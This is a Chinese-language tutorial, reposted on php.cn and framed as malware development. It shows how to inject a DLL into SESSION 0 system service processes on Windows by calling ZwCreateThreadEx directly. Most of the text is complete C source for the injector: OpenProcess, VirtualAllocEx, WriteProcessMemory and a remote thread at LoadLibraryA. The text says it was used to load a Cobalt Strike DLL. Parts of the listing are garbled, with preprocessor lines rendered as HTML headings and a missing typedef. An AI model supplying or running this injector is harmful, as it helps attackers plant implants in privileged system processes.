在早期的windows系统如windows xp和windows server 2003中,第一个登录的用户及其所有服务都在session 0上运行。这种做法可能导致应用程序利用windows服务提升权限。为此,较新的windows版本引入了一种隔离机制,普通应用程序不再在session 0中运行。
由于SESSION 0隔离机制的存在,传统的远程线程注入系统服务进程方法失败。与传统的CreateRemoteThread函数实现的DLL远线程注入不同,我们直接调用了更底层的ZwCreateThreadEx来创建线程。
虽然CreateRemoteThread函数在底层也是调用ZwCreateThreadEx,但ZwCreateThreadEx的第7个参数CreateSuspended(CreateThreadFlags)始终为1,这会导致线程创建后一直挂起无法恢复运行。因此,我们选择直接调用ZwCreateThreadEx,并将第7个参数置为0,以达到注入目的。
ZwCreateThreadEx在ntdll.dll中未声明,因此我们需要使用GetProcAddress从ntdll.dll中获取该函数的导出地址。需要注意的是,64位和32位系统中,函数定义有所不同。64位下的ZwCreateThreadEx函数声明如下:
DWORD WINAPI ZwCreateThreadEx(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
ULONG CreateThreadFlags,
SIZE_T ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
LPVOID pUnkown);而32位下的ZwCreateThreadEx函数声明如下:
DWORD WINAPI ZwCreateThreadEx(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
BOOL CreateSuspended,
DWORD dwStackSize,
DWORD dw1,
DWORD dw2,
LPVOID pUnkown);我们同样使用GetProcAddress从Kernel32.dll中获取LoadLibraryA函数的导出地址:
typedef DWORD(WINAPI* typedef_LoadLibraryA)(char* path);
HMODULE hKeModule = GetModuleHandleA("Kernel32.dll");
typedef_LoadLibraryA myLoadLibraryA = (typedef_LoadLibraryA)GetProcAddress(hKeModule, "LoadLibraryA");随后,我们获取进程句柄,在目标进程空间中申请内存空间,然后将我们的DLL写入到内存空间中,最后创建线程等待执行。
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 6092); LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, lpBaseAddress, DllPath, sizeof(DllPath), 0); ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)myLoadLibraryA, lpBaseAddress, 0, 0, 0, 0, NULL); return 0;
效果如下图所示:
此处使用的DLL为Cobalt Strike生成的64位DLL。完整代码如下:
#include <windows.h>
#include <stdio.h>
<h1>ifdef _WIN64</h1><p>typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
ULONG CreateThreadFlags,
SIZE_T ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
LPVOID pUnkown);</p><h1>else</h1><p>typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
BOOL CreateSuspended,
DWORD dwStackSize,
DWORD dw1,
DWORD dw2,
LPVOID pUnkown);</p><h1>endif</h1><p>int main(int argc, char* argv[]) {
char DllPath[] = "C:\Users\RTO\Desktop\Injection2\a.dll"; //DLL路径
HANDLE hRemoteThread;
HMODULE hNtModule = GetModuleHandleA("ntdll.dll");
HMODULE hKeModule = GetModuleHandleA("Kernel32.dll");
typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtModule, "ZwCreateThreadEx");
typedef_LoadLibraryA myLoadLibraryA = (typedef_LoadLibraryA)GetProcAddress(hKeModule, "LoadLibraryA");
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 6092); //此处为SESSION 0的进程PID
LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, lpBaseAddress, DllPath, sizeof(DllPath), 0);
ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)myLoadLibraryA, lpBaseAddress, 0, 0, 0, 0, NULL);
return 0;
}需要管理员权限才能执行上述操作。
以上就是恶意软件开发——突破SESSION 0 隔离的远线程注入的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
广告Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
639
收藏
